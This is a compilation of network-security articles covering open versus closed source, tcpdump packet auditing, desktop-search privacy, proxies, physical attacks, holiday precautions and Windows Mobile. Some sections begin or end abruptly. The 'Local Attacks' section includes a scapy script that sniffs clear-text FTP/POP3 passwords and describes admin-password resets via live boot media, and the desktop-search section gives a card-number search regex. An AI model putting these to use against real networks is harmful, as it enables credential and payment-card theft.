Of course, Microsoft has always taken the opposite stance. During the anti-trust trials, they argued vehemently against the court’s proposed remedy of disclosing their source code based on the security risks of doing so.
Who’s right, then? All other issues aside, what are the security advantages and disadvantages of open source vs. proprietary software? Let’s take a look.
Security Through Obscurity
Vendors of proprietary software say keeping the source code closed makes their product more secure. This reasoning is based on logic; certainly you don’t want to advertise what goodies you have in your house and where they’re located to the neighborhood burglars.
Open source advocates counter that this is merely a form of “security through obscurity,” a concept that’s generally dismissed as ineffective in the IT community. And certainly, by itself it won’t protect you, as a homeowner or as a software vendor. Merely keeping quiet about your possessions might make it less likely that thieves will target you, but you’d be foolish to leave your doors unlocked at night just because you haven’t distributed information about what you own.
Keeping the source code closed might deter some hackers, but the large number of successful attacks against Windows and other proprietary software proves that it certainly doesn’t provide any kind of high level of security.
Speaking of the high rate of attacks against Windows, open sourcers often point to that as “proof” that their software is more secure. However, the number of attacks doesn't prove anything except that Windows is a more popular target. If 90% of the people in the neighborhood put their valuables in a particular brand of safe, the smart burglar is going to spend his time learning to crack that type of safe. The other 10% might use a brand of equal or inferior quality, but they might be successfully attacked less often simply because the product they use is not as ubiquitous.
If you were a hacker, and the majority of systems you encountered ran Windows while a smaller number ran a different OS, which one would you prefer to develop attacks and viruses for? Open source proponents are fond of “facts” that show more Windows machines are compromised, more Windows based Web sites are defaced, and so on. But in fact, a lower attack rate that's due to a smaller installed base is just one more form of security through obscurity.
Security Advantages – and Disadvantages – of Open Source
Those in favor of open source say that because everyone has access to the code, bugs and vulnerabilities are found more quickly and thus are fixed more quickly, closing up security holes faster. They also point out that anyone and everyone is free to create a better, more secure version of the software.
Those on the other side maintain that a closed system in which only trusted insiders debug the code makes it less likely that discovered vulnerabilities will be exploited before they can be patched.
They also point out that there are many reasons (in addition to market share) that are unrelated to the technical security of the software but that can account for a larger number of attacks against proprietary software. One is the nature of the “OS wars” – because open source software has traditionally been more difficult to use, those who gravitate toward it tend to be more technically savvy. The larger number of self-proclaimed hackers who are pro-open source and anti-Microsoft means there are more people out there with the motive and the means to write malicious code targeting Windows systems.
Of course, the open source people can respond that the very fact that Microsoft has more “enemies” makes their software inherently less secure because so many are trying to bring it down.
What’s the Answer?
It’s obvious that you can use both statistics and logic to support either side of the argument. Our discussion started off by asking whether open source software is inherently more secure than proprietary software. That is, does opening the source code in itself make it more secure?
Consideration of the facts makes it obvious that having the code available has both advantages and disadvantages in terms of security. Vulnerabilities may be found – and exploited, if they’re found by the wrong people – more easily, but they may also be fixed – if they’re found by the right people – more quickly. There are many factors that affect the security of an operating system or application, from the code level to the user level. Whether or not the source code is open is probably one of the least important factors.
How to Audit your Network via Packet Analysis
Many of us do not give much thought to just what is traversing the corporate network; that is largely a job for the company's system administrator. The thing is, though, that the sysadmin quite often does not look at the packets themselves while going about the business of administering the network. About the only time they do look at actual packets is if there is a network problem that they feel must lie at the protocol level, i.e. the packet level. With that in mind, the fact is that there are untold riches lying in that great mass of packets flying around on your network.
Why should I audit though?
What are the concerns that we as computer network professionals worry about in today's computing environment? Well, for one, spyware infiltrating the corporate LAN is certainly of concern. Spyware is quickly becoming more and more virulent as time marches on, and dealing with this pest is quickly taking center stage. The recent release of new Internet Explorer vulnerabilities has also raised concerns about possible network breaches. There is also the stealthy threat of Trojans, and the ever-present virus. What do most of these things have in common? They will all "dial home", if you will. Once installed on a user's computer they will, in some shape or form, send data back to someone, and that will result in packet flows out through your border gateway. With the creative use of bpf filters and bitmasks, these traffic flows can be found. There will be more on this a little later in this article.
A corporate LAN has a chokepoint through which all traffic must flow, both in and out. This is the edge router, border gateway, or whatever other term you may know it by. Behind this router is normally the main switch, which in turn sometimes has a variety of secondary switches hanging off of it. This type of setup is common today and has some nice features that we can take advantage of. As mentioned above, this chokepoint allows us to see all traffic coming in and out of our network. Bearing this in mind, we can tap into this setup and monitor all of the traffic going both in and out of the network in the following manner.
How do you do it?
What we want to do is plug a hub into the span port of the main switch so that we can see all of the network activity as it exits and enters our network.
After we have plugged our hub into the switch, we would then plug whatever we like into the hub itself. This could consist of an intrusion detection system or a computer used for packet collection and storage. In essence, you could plug in whatever you like at this tap point. This setup is ideal, and a great help in monitoring the health of your network.
There are many different ways to analyze traffic at the packet level. The one I personally espouse is tcpdump with the addition of bitmasks. To many, this analysis method is not user friendly, and they therefore prefer a GUI front end like Ethereal. All of the tools that do packet analysis for you are good, but I would advise you to simply use tcpdump and bitmasks until you master their usage. Simply put, using the mentioned command line tools will help keep your skills sharp and keep you used to seeing packets in their native state. After all, we want to know what is going on with our network via packet inspection. To stay sharp you need to continually exercise your packet reading abilities, and that means not using a GUI! There are very few things Ethereal can do that you can't do in tcpdump. Should you become too dependent on a tool like Ethereal, your skills could degrade.
Taking inventory
Now, to return to our mission of auditing our network, we must first take an inventory of the services the network offers. Does the corporate network have a web server, ftp server, or web mail, and what type of database, if any, is used? Is file sharing enabled? All of these questions must be answered. Once this is done you will have properly baselined your network services and will know what should be present on the LAN. Any traffic that remains is therefore technically suspect. This is a structured and logical approach to take, and it will also help save you some time while combing through the traffic that you have collected.
So we now come back to actually using tcpdump and bitmasks to see what is going on. Pretty much all known services (HTTP, SMTP, POP3, ...) operate on ports below 1024. There are some services that operate above this range, such as SQL Server on port 1433, but the vast majority of known services run below 1024. Knowing this gives us a starting point for running some simple filters looking for specific activity.
Currently one of the main threats to the corporate LAN is the peer-to-peer software that many employees have running on their workstations. It just so happens that the majority of these P2P applications run on ephemeral ports: ports from 1025 up to 65535. With this little nugget of information in mind, we can design a bpf filter with a bitmask looking for any outbound connection attempts on a range of ports from, say, 1025 on up, as shown in the sketch below. That would allow us to see if there is P2P software running on the network. Even though the workstations in your company sit behind a router, and probably a firewall, you can still be the unwitting "victim" of P2P software. All a user has to do is start the file sharing software, search for a file they want, and download it. The problem with P2P shared files is that they are often infected with various malware, so your otherwise secure network has now quite possibly been compromised from within.
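As a sketch, a bpf filter with a bitmask along these lines (the interface name is an example) would flag outbound connection attempts where both ends use ephemeral ports:

tcpdump -nn -i eth0 'tcp[13] & 0x02 != 0 and tcp[0:2] > 1024 and tcp[2:2] > 1024'

Here tcp[13] & 0x02 tests the SYN flag in the TCP header, while tcp[0:2] and tcp[2:2] are the source and destination ports; hits on this filter are candidates for P2P traffic.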
Writing up a filter with the criteria noted above (looking for connections on the ephemeral port range) will easily pick out the packets in question if they are present, though this requires that you log all packets coming into and out of your network. Logging all packets traversing your network is not as daunting a task as you may think. Many companies simply log all packets for an hour and then compress the contents for later inspection if required; this is done to conserve disk space.
If we follow the same parameters described for detecting a peer-to-peer application, we can easily amend the filter to look for other types of undesirable traffic. Spyware, depending on the type, will act in much the same way and can therefore be detected using the same methods. Conversely, if you think you may have been compromised and want to look at the known port range (ports 0 to 1024) for activity other than your offered services, you can still use a bpf filter to do so. It is only slightly more involved to design: you simply exclude known services and check the rest of the known port range for activity.
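For example, to hunt through an hour's capture for activity in the known port range while excluding the services you actually offer (the excluded ports are placeholders for your own baseline):

tcpdump -nn -r hourly.pcap 'tcp[2:2] < 1024 and not (dst port 80 or dst port 25 or dst port 110)'

Anything this prints is traffic to a well-known port that your service baseline says should not exist, and is therefore worth a closer look.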
A side benefit of auditing your network this way is that it reinforces your knowledge of TCP/IP, and specifically of the core protocols themselves: TCP, UDP, IP, and ICMP. The greater your knowledge of the TCP/IP protocol suite, the better you will be able to leverage this investigatory technique. So we now know that auditing our networks at the packet level is not only very much possible, but, I would say, definitely desirable.
For some more information about filtering IDS packets:
http://www.onlamp.com/pub/a/security/2004/06/17/ids_filtering.html
The Security Risks Of Desktop Searches
We ended our call and I didn’t think much more about it until I started being bombarded with E-mails from people disputing my statement about a 35 GB practical limit to the Exchange information store. It seemed that everyone (including the site’s editorial staff) wanted me to prove my statement. The problem was that I couldn’t seem to recall where I had read about the limitation. I could have read about it on the Microsoft Web site, or it could have been in one of the many E-mail based newsletters that I receive. The point is that I had no good way of searching for the information. I did eventually find a reference to the disputed statistic at: http://support.microsoft.com/default.aspx?scid=kb;en-us;823144 but this still wasn’t where I had originally found the information.
The reason why I am telling you about all of this is because Google and several other companies want to solve this particular problem. The idea is that you should be able to search your own computer just as easily as you search the Internet. There are several utilities available that will allow you to search your own computer (including a crude search tool built into Windows), but Google has recently released its own desktop search program.
Before you can really understand the risks associated with Google’s Desktop Search, you need to know a little bit about how it works. Google Desktop Search is what you might call a distributed application. Part of the application gets installed onto your own computer, while part of it runs off of Google’s Web site. The idea behind coding the application in this manner is that you can visit Google and search either the Internet or your own PC through a single interface.
After installing Google Desktop Search, an index is made of the contents of your PC. Included in the index are E-mail messages contained in Outlook and Outlook Express (messages in the Deleted Items folder are not indexed, nor are notes, contacts, journal entries, or to do lists). The software also indexes Microsoft Word, Excel, and PowerPoint files, as well as plain text and AOL Instant Messenger chats.
More interesting, though, is the way that the software's index is updated and the way that documents are cached. Google Desktop Search caches at least one copy of anything that gets indexed. The caching is intended as a time saver because it allows you to preview a document without actually having to open it. The other thing that the caching feature allows you to do is maintain a document history. For example, suppose that you accidentally modified a spreadsheet incorrectly. If you needed to get the original data back, you could open a cached copy from a date prior to the modification. The data would probably look rather funky because it is being displayed outside of Excel, but it can help you rebuild your document.
Documents aren’t the only thing that Google Desktop Search caches. Any time that you receive an E-mail or visit a Web page, the information is automatically cached. This allows you to view previous versions of rapidly changing Web pages. For example, if you wanted to see what MSN’s headline was yesterday, you could just look at a cached copy.
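Google has never published the internals of its indexer, but the core mechanism behind any desktop search tool is an inverted index: a map from words to the files that contain them. The toy Python sketch below is purely illustrative and in no way Google’s actual implementation; for brevity it indexes only .txt files:

import os
import re
from collections import defaultdict

index = defaultdict(set)   # word -> set of files containing that word

def index_tree(root):
    """Walk a directory tree and index the words found in plain-text files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".txt"):   # toy example: text files only
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    for word in re.findall(r"[a-z0-9]+", fh.read().lower()):
                        index[word].add(path)
            except OSError:
                pass   # unreadable file: skip it, as a real indexer would

index_tree(os.path.expanduser("~"))
# An instant lookup instead of a slow disk-wide search:
print(sorted(index["exchange"]))

Once the index is built, answering a query is a dictionary lookup rather than a crawl of the whole disk, which is exactly why these tools feel so fast.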
As you can see, Google Desktop Search can index a wealth of information and place it all at your fingertips for easy access. The problem is that a major security hole has already been discovered.
The security hole (which has supposedly been fixed) was based on the fact that part of Google Desktop Search was Web based. A recent study at Rice University analyzed packets as they were transmitted between Google and a machine running Google Desktop Search. It was soon determined to be fairly easy to spoof such packets and trick a machine into delivering desktop search results to a remote machine over the Internet.
To prove the concept, Rice University developed a Java applet that could theoretically be run on a malicious Web site. If someone who was running Google Desktop Search were lured to the Web site, the site’s owner would be able to collect enough information to be able to remotely search the victim’s computer.
Although Google claims to have fixed the problem, this particular security hole could have proved disastrous. Imagine the consequences if someone with malicious intent were able to remotely search your hard disk. Even if you didn’t have any sensitive documents on your hard disk or any confidential E-mail messages, the cache contains a full history of all of the Web sites that you have visited.
At first, someone being able to search your Web history probably sounds harmless. Sure, it could be a little embarrassing if you are in the habit of visiting a lot of adult Web sites, but that’s the worst that can happen, right? Wrong!
Any time that you shop online, check your bank account, or log into a site requiring a membership, the transmission of anything sensitive is usually encrypted with SSL. The problem is that although SSL encryption protects the page in transit, the page is displayed in its decrypted form when you view it, and that is what Google Desktop Search caches. In other words, Google Desktop Search can cache any Web page, even one that was originally SSL encrypted. This means that if someone can query your local machine, they can gain full access to such pages.
OK, so there have been some security issues with Google’s Desktop Search software, but Google has supposedly fixed all of those issues, so what’s the problem? The problem is that the security holes which have already been demonstrated raise future concerns for privacy, especially when you consider that other companies are working on similar products.
At the risk of sounding paranoid, I want to take a moment and discuss some of the future risks that I perceive with this type of indexing. Surely, no one would dispute that spyware has become a huge problem over the last couple of years. Spyware modules exist that are able to log keystrokes and send them to a database somewhere on the Internet. There are also spyware modules that are able to manipulate Internet Explorer and other operating system components.
I’m not picking on Google, because there are several companies that are currently developing similar desktop search products. However, it stands to reason that sooner or later one of those products will become dominant, just as Google has become the dominant search engine for the Internet. Once that happens, and the indexing program becomes widespread, I think it will only be a matter of time before someone figures out how to read the contents of its index. If someone can create a spyware module that can read this database, and is then able to infect a large number of computers with it, then the person who created the module could theoretically search millions of PCs simultaneously.
Sure, the person doing the search would have to have something specific to search for, but there are all kinds of useful things that a hacker could look for. For example, Google allows you to search a number range. Several months ago, it was possible to search a range of 16-digit numbers beginning with the first four digits of a Visa card number and steal credit card numbers through the search engine. While Google has taken steps to remove that vulnerability, it may be possible to perform that type of search against your own local machine, or against someone else’s local machine.
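To make the idea concrete, here is a hypothetical Python sketch of that class of number-range search; the issuer prefix and the sample text are both made up:

import re

# Hypothetical 4-digit issuer prefix; both it and the sample text are made up
PREFIX = "4123"
pattern = re.compile(r"\b" + PREFIX + r"\d{12}\b")   # 4 + 12 = 16 digits

sample = "order ref 4123456789012345 shipped"
print(pattern.findall(sample))   # ['4123456789012345']

Run against an index of every document on a machine, a trivial pattern like this is all an attacker would need.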
What is a Proxy?
When a workstation on a corporate network asks for a Web page, that request is in turn relayed to the proxy server. The server will check to see if it has a cached version of the page and, if not, it will then go get it and relay it back to the workstation in question.
The nuts and bolts of it
If the above noted scenario still doesn’t make a whole lot of sense to you, then think of it this way. Having such a proxy server will, for one, speed up the browsing experience for a corporate user. It is much faster to serve up a cached page than it is to retrieve it every time. When the proxy server or, in this case, the caching proxy receives a page request it will, as mentioned, check to see if it already has it. It will also check whether the cached page has expired or not. Should the requested resource have expired, it will go and get a new copy. That alone makes it worth having a proxy server on a network, but there are many other advantages to having one. Those advantages very much impact the security posture of a corporate network as well, hence their prevalent usage. One of the most obvious advantages is being able to centralize all web page requests in one location. This establishes a chokepoint that can be leveraged for security purposes.
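The serve-from-cache-unless-expired logic is easy to sketch. The Python fragment below is illustrative only and assumes a fixed time-to-live; a real caching proxy would honor the HTTP cache-control headers instead:

import time
import urllib.request

CACHE_TTL = 300   # assumed freshness window, in seconds
cache = {}        # url -> (time fetched, page body)

def fetch(url):
    """Serve a page from cache while fresh; otherwise retrieve a new copy."""
    now = time.time()
    if url in cache:
        fetched_at, body = cache[url]
        if now - fetched_at < CACHE_TTL:
            return body                    # cache hit: no network round trip
    with urllib.request.urlopen(url) as resp:   # miss or expired: go get it
        body = resp.read()
    cache[url] = (now, body)
    return body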
The transparent proxy
Just as I mentioned above, having all client requests go through a single computer gives one the ability to monitor client usage; by client I mean a corporate workstation. This centralization is often said to be achieved by configuring the client browser to use the proxy server’s address, with the result called a transparent proxy. Though that definition of a transparent proxy is a popular one, it is also incorrect. In reality a transparent proxy is a combination of proxy server and NAT (network address translation) technology. In essence, client connections are NAT’d so that they can be routed to the transparent proxy without any configuration on the client at all. Having this type of setup is also a major pain, I am told, to implement and maintain.
The reverse proxy
What the devil is a reverse proxy, you ask!? Good question indeed. Typically a reverse proxy is installed in close proximity to one or several web servers. What actually happens is that the reverse proxy itself is the point of first contact for all traffic directed at the web servers. Why go through the bother of this? Well, for several reasons actually. One of the primary ones is security: the reverse proxy is a first layer and acts as a buffer for the web servers themselves. Another reason is SSL connections. Encryption is a computationally intensive task, and having it performed on the reverse proxy, vice the actual web server, makes sense in terms of performance. Were the web servers themselves handling both the encryption and the actual serving of pages, those machines would quickly become rather slow. For that reason the reverse proxy is equipped to handle the SSL connections and normally has some type of acceleration hardware installed on it for this very purpose.
Another key reason that the reverse proxy is employed is load balancing. Think of a popular website that has a lot of visitors at any given time. It makes sense that there would be multiple web servers there to handle all incoming page requests. With a reverse proxy in front of these back-end web servers, no one box gets crushed; rather, the load is balanced across all of the web servers. This certainly helps overall performance. Another feature of the reverse proxy is the ability to cache certain content in an effort to take further load off of the web servers. Lastly, the reverse proxy can also handle any compression duties that are required. All in all, there is a tremendous amount of work being done by the reverse proxy.
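For illustration, here is a bare-bones Python sketch of the load-balancing role, with an assumed pool of two placeholder back-end addresses; a production reverse proxy would add health checks, header forwarding and connection pooling:

import itertools
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed back-end pool; the addresses are placeholders
BACKENDS = itertools.cycle(["http://10.0.0.11:8080", "http://10.0.0.12:8080"])

class ReverseProxy(BaseHTTPRequestHandler):
    def do_GET(self):
        backend = next(BACKENDS)                 # round-robin: spread the load
        with urllib.request.urlopen(backend + self.path) as resp:
            status, body = resp.status, resp.read()
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("", 8000), ReverseProxy).serve_forever()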
Split proxies
Just when you think you’re done there is always something else! In this case that would be the split proxy. Much as its name implies, the split proxy is simply two cooperating proxies installed on two separate computers, one near the client and one near the server. It’s that simple really. Although this type of proxy configuration is one that I have never come across, I have heard of them being used. One of its main selling points is the ability to compress the data passing between the two halves, and that is a boon when slow networks are involved.
Wrap up
Over the course of this article we have seen the various types of proxies in use today in many corporate network environments. As we have seen, many of them are used for specific reasons; there is not really one proxy type that can do it all, hence the variety. One of the greatest abilities of the proxy is to help enforce an acceptable usage policy on a corporate network. All too often we hear about someone who was fired for inappropriate use of company computer assets. What that neat use of the English language usually means is that someone was surfing for pornography from work, and on company time no less. Even though someone doing this is acting foolishly and deserves to be terminated, there are other reasons as well to control and monitor employee Internet usage. You can imagine, for example, how well it would go over for a high-profile, publicly traded company to have an employee caught downloading kiddie porn. If that type of news hits the media, all of a sudden your company stock price could take a nose dive. Having a proxy in place within a corporate setting is really not only common sense, but also a necessity. While most company employees are hard working and above board, there will always be one or two who are not. Having the ability to catch and deal with them quickly is very much desired.
Local Attacks
Remote code execution is a phrase that always gets a lot of press and attention from computer security professionals. Remotely compromising a computer, however, is not the only threat posed to a network. What about a local attack carried out by a trusted, or otherwise, individual?
Local attacks
We are becoming pretty much used to reading about new remote code execution exploits associated with various programs and operating systems. It is normally the goal of any hacker to obtain a means of executing their own code on the victim computer. This is a rather obvious goal really, for why else would you attack a computer if not for the end state of being able to control it in some way? The same applies to exploits which result in a denial of service condition, though a denial of service is generally regarded by most as less critical than an exploit which results in remote code execution.
What do remote code execution and a denial of service attack have in common though? Well normally they are linked with someone attacking you remotely i.e. they are not in the same physical space as you. This is not the only means of attacking a computer though. There is also the ever present threat of the trusted employee. I won’t bother regurgitating the statistics, but it seems many groups and federal agencies believe that half of all computer breaches result from the acts of a trusted insider. That is indeed a high number and is probably open to debate. One thing that can be taken for granted though is that there are attacks mounted by those with physical access to a computer network.
Let’s put it into perspective
With the above said, just what kind of attack are we likely to see if a person with malicious intent has physical access to a computer on a network? The answer really depends on the security put in place for that computer network. Typically there is very little security in place on most computers in a corporate network. So I shall just go ahead and list some attacks that can take place.
First off, an attacker sees that the computer is prompting them for the usual username and password combination. What does the attacker do? Well, they can simply drop in their favorite live Linux distro or other such tool. Once they have power-cycled the computer it will boot off the media, and the admin password can be changed shortly thereafter. Once the attacker has system administrator credentials there is potential for all kinds of nastiness.
Though the intent of the attacker may not necessarily be to log on as the sys admin, once again the allure of using a live Linux distro is very compelling. These tools contain a treasure trove of attack tools waiting to be invoked once the computer has booted off of it. Now the attacker can go about trying to do privilege escalation by sniffing the traffic on the network and hopefully snarf some passwords. The attacker could also be on the lookout for emails that are flying about the network. There is often rather sensitive data contained in corporate emails.
Another vital area of a computer network that can be exploited via a live Linux distro is the SNMP traffic flying about the network. There is an incredible amount of information available via these SNMP exchanges. You can gauge the uptimes of various servers, for one. That type of server information is key in determining whether or not a server has been patched against a specific exploit. Seen below is an example of an SNMP packet as seen “on the wire”.
The strings of dotted digits in the packet are OIDs, or object identifiers. It is these OIDs that convey specific system information for a device such as, say, an IIS server. The OIDs below could reflect the server’s uptime, server load, or NIC throughput. It is by decoding these OIDs that you can glean critical information about a network. That said, you would ideally have the right software to do it with. Ethereal will do a pretty good job of decoding them, but you would preferably have the actual management software that generated them, such as WhatsUp Gold, in order to interpret them fully.
01:31:26.631025 192.168.1.200.161 > 192.168.1.100.40274: { SNMPv1 C=testnet-pub { GetResponse(90) R=1546751089 .1.3.6.1.2.1.2.2.1.10.24=3936973547 .1.3.6.1.2.1.2.2.1.16.24=3178267035 .1.3.6.1.2.1.1.3.0=4268685032 .1.3.6.1.2.1.1.5.0="G" } } (ttl 255, id 41656, len 148)
0x0000 4500 0094 a2b8 0000 ff11 151c c0a8 01c8 E...............
0x0010 c0a8 0164 00a1 9d52 0080 3f43 3076 0201 ........R..?C0v..
0x0020 0123 0123 0123 6574 2d70 7562 a266 0204 ..testnet-pub.f..
0x0030 5c31 8c71 0201 0002 0100 3058 3013 060a \1.q......0X0...
0x0040 2b06 0102 0102 0201 0a18 4105 00ea a972 +.........A....r
0x0050 eb30 1306 0a2b 0601 0201 0202 0110 1841 ..0...+.........A
0x0060 0500 bd70 819b 3011 0608 2b06 0102 0101 ....p..0...+.....
0x0070 0300 4305 00fe 6ef6 e830 1906 082b 0601 ...C...n..0...+..
0x0080 0201 0105 0004 0d47 .......G
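If you want to query such OIDs yourself, the pysnmp library (assuming it is installed and the agent is reachable) makes it a few lines of Python; the community string and address below are taken from the capture above:

from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

error_indication, error_status, error_index, var_binds = next(getCmd(
    SnmpEngine(),
    CommunityData('testnet-pub', mpModel=0),           # mpModel=0 selects SNMPv1
    UdpTransportTarget(('192.168.1.200', 161)),
    ContextData(),
    ObjectType(ObjectIdentity('1.3.6.1.2.1.1.3.0')),   # sysUpTime
    ObjectType(ObjectIdentity('1.3.6.1.2.1.1.5.0'))))  # sysName

if error_indication:
    print(error_indication)
else:
    for var_bind in var_binds:
        print(' = '.join(x.prettyPrint() for x in var_bind))

Note how all it takes is the community string, which in SNMPv1 travels in clear text for any sniffer to pick up.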
So we have seen that physical access to a computer can be disastrous should an attacker boot off of a CD such as the one described above. That is not the only risk, though. The same attack can be carried out via USB drives as well. These portable devices have gained in popularity and storage size, and you can easily fit a Linux distribution on one of them. Access to USB drives, and the ability to boot off of CD drives, needs to be restricted. This can be done with relative ease and can be read about here.
Beyond live CD’s and USB sticks
Well, when it comes to local attacks pulled off due to physical access, there is more to it than the aforementioned. One of the craftier ones that I have seen is the hardware keylogger. Think about it, any system administrators who may be reading this: just how often do you actually visually inspect system components like the keyboard and mouse? Odds are that you check them rarely, if at all. This is why a hardware keylogger is so effective. You simply need to attach it and walk away. It will rarely if ever be detected; after all, it leaves no footprint on the affected computer, nor will anti-virus software detect it. Rather ideal if you ask me. Once an attacker is physically in a network it would take mere seconds to install one.
Along the lines of the live Linux distros mentioned above is a suite of tools that has been ported to the world of win32. The dsniff suite is a very powerful one indeed. Built into this toolset is the ability to intercept emails, see the sites being surfed to, and also do packet sniffing to get those much desired passwords. The only caveat for use of this tool is the need for winpcap to be installed. That, though, can be easily and quickly done by an attacker.
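To give a sense of just how little code clear-text credential sniffing takes, here is a short Python sketch using scapy; this is not dsniff itself, just an illustration against FTP and POP3, two protocols that send logins unencrypted:

from scapy.all import sniff, TCP, Raw

def creds(pkt):
    """Print FTP/POP3 commands that carry credentials in clear text."""
    if pkt.haslayer(Raw):
        payload = pkt[Raw].load
        if payload.startswith((b"USER ", b"PASS ")):
            print(pkt[TCP].sport, "->", pkt[TCP].dport, payload.strip())

# FTP (21) and POP3 (110) both transmit logins unencrypted
sniff(filter="tcp port 21 or tcp port 110", prn=creds, store=False)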
Of Trojans and LSP’s
Having physical access to a computer also gives one the ability to install trojans, including the stealthy LSP (layered service provider) trojan. Both of these malware specimens can be written so that they evade detection by all anti-virus vendors’ signatures. That would imply that someone with programming ability has written custom code. This is not as far-fetched as you might think. It happens all the time in the world of corporate espionage. I hope you will read the last hyperlink I just provided, as it will certainly drive home the fact that corporate espionage does happen. It is a heck of a lot cheaper to pay some programmer a five-figure sum of money which in turn allows you to gain, say, untold millions in terms of corporate research. That math is not difficult to figure out.
The wrap up
While I have only listed some of the physical attacks that a computer could fall prey to, there are many others, as well as variations of the ones listed. All you can do is tighten down your network as best you can, and that includes leveraging the power of GPO’s, restricting physical access to your computer resources, and other preventative measures. Each network will have its own quirks. You must sit down and give your security needs some sober thought. Once you have charted out your weaknesses, you will be well on your way to securing them. Please remember that not all attacks are done remotely. There will always be the ever-present threat of attacks performed by those with physical access. I sincerely hope that this article was of interest to you, and as always I welcome your feedback. Till next time!
Issues to look out for during the holiday season
During the Christmas period, companies are at higher risk of having one or more employees copy copyrighted material onto their network. This can be attributed to a number of factors. Employees will figure that security will be more lax, with the possibility of multiple administrators on holiday, and will risk more than usual, figuring they can get away with copying or downloading illegal material without getting caught.
During Christmas time a lot of people buy presents for each other. In the tech industry especially, but even in other industries, it is likely that a good deal of these presents will be electronic gadgets of some kind: gadgets that can copy and carry a good deal of data, such as mp3 players, portable video players, cameras, and portable storage. Eager to try these devices out, employees are likely to bring them to work.
Spam and social engineering mails are also a possible source of piracy. Vendors of illegal software might try selling pirated copies at low prices, portraying the low price as a big Christmas discount to make the deal seem more legitimate.
Strong Passwords
Before leaving for Christmas holidays, it is essential to ensure that any computers which will be left running have strong passwords. During the Christmas holidays machines are more likely to suffer attacks.
Malicious persons will likely be on holiday as well, thus having more time on their hands to perform targeted attacks.
Attackers will figure that security is probably quite lax as administrators too go on holiday. This would be the perfect time to run brute force attacks, which are not likely to be detected or acted upon until after the new year; plenty of time to cover tracks and establish a stronghold on the hacked machine.
Administrators absence
As administrators take holidays there are numerous aspects that have to be considered and secured. The security of the network must still be handled efficiently, even with the decreased administrator-to-user ratio or even, in some cases, complete administrator absence.
Automatic updates. During the holiday season, viruses and malware are more likely to be on the rise as virus writers take a break from their respective workplaces and find themselves with more free time. Thus it is essential that, in the administrators’ absence, antivirus software continues running, scanning the network and updating itself with the latest virus definition files.
As administrators are away from work, or a small percentage of administrators are left to cope with a large workload, systems must be in place to automatically monitor the network situation and alert administrators when things go wrong. During the holiday season it is essential that such tools support notifications not only through email but also through mobile technologies such as SMS. This is crucial, as email checking might suffer since people tend to be more socially active during this time of the year.
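As a minimal sketch of such a monitoring tool, the Python fragment below probes a service and mails an alert through an internal SMTP relay; every host name and address in it is a placeholder, and SMS delivery is assumed to go through a carrier’s email-to-SMS gateway:

import smtplib
import socket
from email.message import EmailMessage

# All names below are placeholders for your own environment
TARGET = ("10.0.0.5", 80)                 # host and port to watch
SMTP_RELAY = "mail.example.com"           # internal mail relay
ALERT_TO = "5551234567@sms.example.com"   # carrier email-to-SMS gateway address

def service_is_up(host, port, timeout=5):
    """A TCP connect is a crude but effective liveness probe."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def send_alert(text):
    msg = EmailMessage()
    msg["Subject"] = "Service alert"
    msg["From"] = "monitor@example.com"
    msg["To"] = ALERT_TO
    msg.set_content(text)
    with smtplib.SMTP(SMTP_RELAY) as smtp:
        smtp.send_message(msg)

if not service_is_up(*TARGET):
    send_alert("%s:%d is not responding" % TARGET)

Scheduled to run every few minutes, even a watchdog this simple covers the period when nobody is reading email.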
Company Shutdown
As companies shut down for the Christmas period, it is essential that not only the personnel go on shutdown, but the non-essential services as well.
Wireless is one such service that, unless it is really needed during a company shutdown, should be switched off. Wireless is a favorite attack vector as it gives a direct opportunity to gain access to the internal network infrastructure without having to physically break into the company building itself. The technology allows an attacker to, for example, park his car next to the company building and use wireless sniffing software to capture communication packets, exploit weak passwords, and mount man-in-the-middle attacks against exposed shares, unpatched operating systems and more. When not needed, especially during a Christmas shutdown, wireless should strictly be turned off.
Further to wireless, any services and servers which are not required during the Christmas shutdown should also be disabled. This will ensure that, if the organization is targeted, hackers will have the minimum number of attack vectors available to them.
Ref: http://www.eimagazine.com/xq/asp/sid.0/articleid.A2E3D650-5469-4DAD-9C7F-BC3739D836B4/qx/display.htm
Physical Security
During the Christmas period one would generally find fewer people at work places, because most people would be enjoying Christmas holidays. Such a situation might make insiders with bad intent feel safer about trying to access restricted information, and they might consider acting on it during this low period. Thus it is imperative to ensure critical servers which hold crucial information are physically secure. Administrators should ensure server rooms are securely locked before leaving for holidays. The same goes for network switches, wireless equipment and any other device which might provide an entry point to secure networks.
Administrator computers should be considered critical computers which also need to be physically secured, just like servers. Furthermore, hard disk content should be encrypted. If hard disk content is left unencrypted and the only security relied upon is the login procedure, people with ill intent who have access to the administrator computer could easily extract the hard disk, connect it to another computer, and possibly copy passwords or implant trojans and sniffers to allow easier future network penetration.
Windows Mobile 6.x security mechanisms
If the mobile devices on your network run Windows Mobile 6.x, they can benefit from the security mechanisms built in, which include the following:
- Password protection: Windows Mobile devices give you the option of using a simple 4-digit numerical PIN or an alphanumeric password up to 20 characters in length, which can be made up of upper and lower case letters, numbers and symbols. The device should be set to lock after a reasonable period of time following power-down (you can set a Windows Mobile device to prompt for the password after anywhere from 0 minutes to 24 hours). You can even configure the local device-wipe feature to do a hard reset and remove all the user data if the wrong PIN or password is entered more than a specified number of times.
- Support for digital certificates: Windows Mobile can use digital certificates to control which applications are allowed to run based on the digital signature.
- Certificate based authentication: For better security, Windows Mobile supports authentication using Transport Layer Security (TLS) with an encryption key up to 2048 bits. Desktop enrollment is performed by connecting the Windows Mobile device to a PC in the domain where the certificate server resides. The certificate is installed on the mobile device through the PC.
- Local data encryption: Windows Mobile 6 can encrypt data written to removable storage cards, as discussed further below.
You have even more control over mobile device security if your network runs Exchange Server 2007. Here’s how this combination can address the issues raised above:
